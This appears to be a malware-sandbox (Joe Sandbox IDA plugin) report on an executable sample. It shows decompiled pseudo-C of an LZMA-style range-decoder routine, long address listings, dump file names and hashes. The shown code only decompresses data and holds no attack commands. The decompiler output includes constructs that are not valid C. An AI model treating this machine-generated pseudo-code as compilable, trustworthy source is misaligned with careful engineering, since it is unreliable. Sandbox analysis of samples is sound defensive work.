												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406e9d
0x00406e9d
0x00406ea1
0x00406ec2
0x00406ec9
0x00406ecf
0x00406ed5
0x00406ee7
0x00406eed
0x00406ef2
0x00000000
0x00406ea3
0x00406ea9
0x0040726a
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a
0x00000000
0x00406ea1

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406FBB Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FBB() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
